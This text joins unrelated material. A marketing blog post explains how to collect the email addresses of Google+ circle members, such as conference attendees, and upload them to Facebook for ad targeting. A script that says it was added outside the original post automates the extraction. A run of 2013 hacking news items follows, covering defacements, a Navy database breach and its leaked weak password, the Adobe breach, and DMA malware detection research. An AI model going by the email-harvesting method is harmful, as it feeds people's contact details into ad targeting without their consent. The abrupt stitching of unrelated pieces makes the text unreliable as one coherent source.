Too often, marketers get caught in the same social network wars that users do, neglecting that while a certain social network may not be their favorite to use, there is definitely a marketing advantage to using it.

It’s way too easy to focus on Facebook and forget that Google+ and Twitter are out there with hundreds of millions of users waiting to hear about your product. As a result, I really try to avoid these biases to ensure I’m taking the best that each network has to offer in my marketing campaigns.

It was with this approach that I discovered a way just yesterday to utilize your Google+ circles to better target your ad campaigns on Facebook, and it’s pretty simple. It involves Google+, Google Contacts, and Custom Audiences within Facebook Power Editor.
Here’s how it works:

Create and Add Google+ Users to Circles

The first step is to identify different segments of users on Google+ you could be targeting. Recently, I spoke at Social Media Examiner’s Social Media Success Summit conference and asked them all to share their experiences on Google+ using the hashtag, #SMSS13.
This did 2 things: it got the term to trend (it’s much easier to trend on Google+ than Twitter), and it gave me a way to identify all the Google+ users that were participating in my talk.
From this group of users, we created a shared circle that we also shared with others participating in the conversation so that others could identify who was missing. This now gave me a list I could use on Google+, but guess what? I could also use it through Google Contacts.

Use Google Contacts to Obtain Email Addresses

One of my favorite features of Google+ is its integration with all other Google Products. One of the most powerful of those integrations is Google Contacts. For every circle you create on Google+, it also gives you access to those users’ information in Google Contacts as well.
This means if they’ve made their email address accessible to the people that have circled them, or to the public, their email address will appear in Google Contacts. Now you have an instant email list!
The problem I’ve found with Google Contacts is that for some reason you can’t export the email addresses through their export feature, but you can email everyone in a particular circle. So what I do is select the circle on the left, check all the names in the circle, and then click the little email icon at the top.
This puts all of the names and email addresses in the “To” field in a Gmail compose box. Now all I have to do is copy all those into a text file (on Windows I just use Notepad for this and save as text) and import them into Excel.

Format the Excel File

For this exercise you really only need the email addresses, but you need each one in a separate row. Copying and pasting the names and emails into a text file puts them all on the same line, including stray characters and text. What I do is import the file as CSV, which puts each name and email in a separate column.
Then, if you select all of them in Excel, copy (cut does not work), and then highlight the row below, right click and select “paste special” you can select “transpose” to put them all in a single column.
Now, with a little bit of row-splitting magic (you can Google this; split on the “>”), and some find-and-replace on the stray “>” and “<” and other characters you see, you can get rid of the names column and have a single column of pure email addresses. Just save this in .csv (comma-separated value) format and you’re done. Now for the fun part!

Create a Custom Audience in Power Editor

Now you just need to import the file into Power Editor as a custom audience you can now target for future ad campaigns. To do this, go to “Audiences” on the left in Power Editor, select “Create Audience” in the drop-down at the top, and then “Custom Audience”.
Here you can name your audience and upload the CSV file you just created. Facebook will match these emails with users in its database, and now you have a custom, micro-targeted audience you can start using in your ad campaigns! So if I have follow-up material I want to share with those I spoke to, I now get to have an ad waiting for them when they get back to Facebook.
Give it a try and let me know what you think!
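The manual Excel steps above (import as CSV, transpose, split on “>”, find-and-replace the brackets) can be done in one pass with a small script. This is an added example, not code from the original post: it takes the text pasted from the Gmail “To” field, pulls out just the addresses, drops duplicates, and writes the one-per-row CSV that the Custom Audience upload expects. The sample names and addresses are constructed, and the `email` header row is an assumption (remove it if the upload form rejects a header).

```python
import csv
import io
import re

# Constructed sample of what the Gmail "To" field looks like after it is
# copied into a text file: "Display Name <address>" entries separated by
# commas, with quoting, stray whitespace, a bare address, a quoted name
# that itself contains a comma, and one person listed twice.
SAMPLE_TO_FIELD = (
    '"Alice Example" <alice@example.com>, Bob Example <bob@example.org>,  '
    'carol@example.net, "Dave, Jr." <dave@example.com>, '
    'Alice Example <Alice@Example.com>'
)

# Loose address pattern: strict enough to skip display names, angle
# brackets, quotes and commas; Facebook does the real matching later.
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")


def extract_emails(to_field: str) -> list[str]:
    """Return the unique e-mail addresses in a pasted To field, in order.

    This replaces the transpose / split-on-">" / find-and-replace steps:
    the regex ignores everything that is not an address, and addresses are
    lower-cased so the same person listed twice (or in two circles) only
    appears once in the audience file.
    """
    seen = set()
    result = []
    for match in EMAIL_RE.finditer(to_field):
        address = match.group(0).lower()
        if address not in seen:
            seen.add(address)
            result.append(address)
    return result


def to_csv(emails: list[str]) -> str:
    """Render one address per row as CSV text.

    The "email" header row is an assumption about the upload format;
    drop the writerow(["email"]) line if the form only wants addresses.
    """
    buf = io.StringIO()
    writer = csv.writer(buf)
    writer.writerow(["email"])
    for address in emails:
        writer.writerow([address])
    return buf.getvalue()


if __name__ == "__main__":
    # Write the audience file next to the script; open it in Power Editor.
    addresses = extract_emails(SAMPLE_TO_FIELD)
    with open("custom_audience.csv", "w", newline="") as fh:
        fh.write(to_csv(addresses))
    print(f"wrote {len(addresses)} unique addresses")
```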

Tuesday 15 October 2013

Metasploit and Rapid7 DNS hijacked and Defaced by Kdms Team





The domains of Metasploit.com and its parent company Rapid7.com were hijacked and defaced by the KDMS Team, which had previously taken down several other high-profile computer-security targets.


Mr. HD Moore (Chief Research Officer of Rapid7 and Chief Architect of Metasploit) told EHN how the domain was hijacked. 

Tuesday 8 October 2013

'India needs more than 4 lakh hackers'




According to CERT-In, the national incident response centre and a government nodal agency, at least 42 million Indians were hit by cyber crimes in the past 12 months, with a recorded loss of a staggering $8 billion.
Mohan Gandhi, an Indian Institute of Management Ahmedabad graduate, provides anti-piracy solutions through his company Entersoft Information Systems. In this interview with rediff.com's Vicky Nanjappa, Gandhi speaks about the challenges of dealing with cyber security and what it is to be an ethical hacker.
How important is it for India to have ethical hackers?
Forty two million Indians were hit by cyber crimes in the last 12 months, with a total of $8 billion recorded in direct financial losses to the corporate world. India is the third-most affected nation due to hackers.
In terms of cyber attacking abilities and fortification standards, India is far below Israel, the United States and China. China filters and monitors almost every packet/piece of information.
Unfortunately, India has seen many government, and defense websites being hacked in the recent times. Our country has been traditionally defensive in terms of information security.
Have we identified the importance of ethical hackers?
Corporate India has now identified the importance of ethical hackers, and almost every security company has them as a strategy to perform ethical covert activities. According to the latest estimation by CERT-In, India is in need of more than 4 lakh ethical hackers.
The world has seen how important intellectual property in this century is. Firms such as Apple, Samsung and Microsoft of the world use patenting for competitive edge.

Whatsapp and AVG Antivirus Website defaced by Palestinian Hackers

The websites of the world's most popular mobile messaging app, WhatsApp, and the antivirus firm AVG were hacked this morning and defaced by a new Palestinian hacker group, KDMS Team, affiliated with Anonymous.
The defacement page, titled 'You got Pwned', with the Anonymous logo and the Palestinian national anthem playing in the page background, says:
we want to tell you that there is a land called Palestine on the earth
this land has been stolen by Zionist
do you know it ?
Palestinian people has the right to live in peace
Deserve to liberate their land and release all prisoners from israeli jails
we want peace
and "There Is No Full Security We Can Catch You !"
It seems that the hackers used DNS hijacking to point the domains at a fake server hosting the deface page. WhatsApp has resolved the issue, but at the time of writing AVG is still defaced. It is not clear whether any user data was compromised from AVG or WhatsApp.

We have contacted WhatsApp and AVG for comment and will update this story when we hear back. Just two days earlier, KDMS Team hacked LeaseWeb, one of the world's biggest hosting companies.

Update: The website of another antivirus firm, Avira, was also defaced by the hackers just a few minutes ago.

Update: Network Solutions, LLC is the common domain registrar for AVG, Avira and WhatsApp. Possibly the hackers compromised the domain registrar and modified the DNS settings to perform the DNS hijacking.

Monday 7 October 2013

Philippines Navy website hacked by Pr3 H4ck3r

A hacker with the handle "Pr3 H4ck3r" from the Philippine Cyber Army has claimed to have hacked into the database of the Philippine Navy website.

According to the hacker's statement, he compromised the data by exploiting an SQL injection vulnerability in the Navy's "BRP Alcaraz blog" page (navy.mil.ph/alcaraz).

However, we were not able to access the given link at the time of writing; it appears the admin has taken the page down. The news was first reported by the local hacking news site PinoyHackNews.

In a pastebin post (pastebin.com/5xhP6zft), the hackers leaked the login credentials compromised from the database, including the admin login credentials. What's worse is that they were using a very weak username and password.

They used "userpassword" as the password. Even without a bug, a hacker could have guessed the password or obtained it by brute-forcing. It is sad that the Navy website itself has such poor security and weak passwords.

Jordan's PM's website hacked by Anonymous hacktivist



Anonymous hacktivists have hacked into the official website of Jordan's Prime Ministry in protest against rising taxes and prices. The website was defaced with a message in Arabic to Prime Minister Abdullah Nsur.

"Hi uncle, how are you? We are sorry, we hacked your website. Are you upset? We feel much worse when you raise prices. The people know this feeling but you do not," the defacement message reads.

According to a Voice of Russia report, the website was restored after being hacked for several hours. Officials claimed to have identified the attackers.

Friday 4 October 2013

Adobe To Announce Source Code, Customer Data Breach

Adobe Systems Inc. is expected to announce today that hackers broke into its network and stole source code for an as-yet undetermined number of software titles, including its ColdFusion Web application platform, and possibly its Acrobat family of products. The company said hackers also accessed nearly three million customer credit card records, and stole login data for an undetermined number of Adobe user accounts.
A screen shot of purloined source code stolen from Adobe, shared with the company by KrebsOnSecurity.
KrebsOnSecurity first became aware of the source code leak roughly one week ago, when this author — working in conjunction with fellow researcher Alex Holden, CISO of Hold Security LLC — discovered a massive 40 GB source code trove stashed on a server used by the same cyber criminals believed to have hacked into major data aggregators earlier this year, including LexisNexis, Dun & Bradstreet and Kroll. The hacking team’s server contained huge repositories of uncompiled and compiled code that appeared to be source code for ColdFusion and Adobe Acrobat.
Shortly after that discovery, KrebsOnSecurity shared several screen shots of the code repositories with Adobe. Today, Adobe responded with confirmation that it has been working on an investigation into a potentially broad-ranging breach into its networks since Sept. 17, 2013.
In an interview with this publication earlier today, Adobe confirmed that the company believes that hackers accessed a source code repository sometime in mid-August 2013, after breaking into a portion of Adobe’s network that handled credit card transactions for customers. Adobe believes the attackers stole credit card and other data on approximately 2.9 million customers, and that the bad guys also accessed an as-yet-undetermined number of user names and passwords that customers use to access various parts of the Adobe customer network.
ColdFusion source code repository found on hacker’s server.
Adobe said the credit card numbers were encrypted and that the company does not believe decrypted credit card numbers left its network. Nevertheless, the company said that later today it will begin the process of notifying affected customers — which include many Revel and Creative Cloud account users —  via email that they need to reset their passwords.
In an interview prior to sending out a news alert on the company’s findings, Adobe’s Chief Security Officer Brad Arkin said the information shared by this publication “helped steer our investigation in a new direction.” Arkin said the company has undertaken a rigorous review of the ColdFusion code shipped since the code archive was compromised, and that it is confident that the source code for ColdFusion code that shipped following the incident “maintained its integrity.”
“We are in the early days of what we expect will be an extremely long and thorough response to this incident,” Arkin said. The company is expected to publish an official statement this afternoon outlining the broad points of its investigation so far.
Arkin said Adobe is still in the process of determining what source code for other products may have been accessed by the attackers, and conceded that Adobe Acrobat may have been among the products the bad guys touched. Indeed, one of the screen shots this publication shared with Adobe indicates that the attackers also had access to Acrobat code, including what appears to be code for as-yet unreleased Acrobat components (see screen grab above).
“We’re still at the brainstorming phase to come up with ways to provide higher level of assurance for the integrity of our products, and that’s going to be a key part of our response,” Arkin said. He noted that the company was in the process of looking for anomalous check-in activity on its code repositories and for other things that might seem out of place.
“We are looking at malware analysis and exploring the different digital assets we have. Right now the investigation is really into the trail of breadcrumbs of where the bad guys touched.”
The revelations come just two days after KrebsOnSecurity published a story indicating that the same attackers apparently responsible for this breach were also involved in the intrusions into the networks of the National White Collar Crime Center (NW3C), a congressionally-funded non-profit organization that provides training, investigative support and research to agencies and entities involved in the prevention, investigation and prosecution of cybercrime. As noted in that story, the attackers appear to have initiated the intrusion into the NW3C using a set of attack tools that leveraged security vulnerabilities in Adobe’s ColdFusion Web application server.
While Adobe many months ago issued security updates to plug all of the ColdFusion vulnerabilities used by the attackers, many networks apparently run outdated versions of the software, leaving them vulnerable to compromise. This indeed may have also been the vector that attackers used to infiltrate Adobe’s own networks; Arkin said the company has not yet determined whether the servers that were breached were running ColdFusion, but acknowledged that the attackers appear to have gotten their foot in the door through “some type of out-of-date” software.
Stay tuned for further updates on this rapidly-moving story.

Research detects dangerous malware hiding in peripherals

A Berlin researcher has demonstrated the capability to detect previously undetectable stealthy malware that resides in graphics and network cards.
Patrick Stewin's proof of concept demonstrated that a detector could be built to find the sophisticated malware that ran on dedicated devices and attacked direct memory access (DMA).
The attacks launched by the malware dubbed DAGGER targeted host runtime memory using DMA provided to hardware devices. These attacks were not within scope of antimalware systems and therefore not detected.
DAGGER, also developed by Stewin and Iurii Bystrov of the FGSect Technical University of Berlin research group, attacked 32bit and 64bit Windows and Linux systems and could bypass memory address randomisation.
After beginning life last year as a keylogger, DAGGER has recently been upgraded with new functionality and now includes the ability to update its attack behaviour at runtime via an out-of-band channel.
"DMA malware is stealthy to a point where the host cannot detect its presence," Stewin said.
In a paper Stewin will present next month, he said the DMA attacks were both dangerous and undetectable.
"DMA-based attacks launched from peripherals are capable of compromising the host without exploiting vulnerabilities present in the operating system running on the host.
"Therefore they present a highly critical threat to system security and integrity. Unfortunately, to date no OS (operating system) implements security mechanisms that can detect DMA-based attacks. Furthermore, attacks against memory management units have been demonstrated in the past and therefore cannot be considered trustworthy."
The German government-funded research was closing in on its aim of developing a reliable detector for DMA malware.
"At the moment we have a proof-of-concept that proves that a detector is possible," Stewin said in an email to SC. "It can find DAGGER."
The proof-of-concept was based on a runtime monitor dubbed BARM which modelled and compared expected memory bus activity to the resulting activity, meaning malware residing on peripherals would be detected.
Stewin said the detector would not significantly drain compute resources.
Some detectors had been previously developed but they required that peripherals be modified or that a special debug feature exist.
The researchers aimed to develop the proof of concept into a detector that did not require modification.
The pair would present the research paper "A Primitive for Revealing Stealthy Peripheral-based Attacks on the Computing Platform's Main Memory" at the 16th International Symposium on Research in Attacks, Intrusions and Defenses in October in Saint Lucia.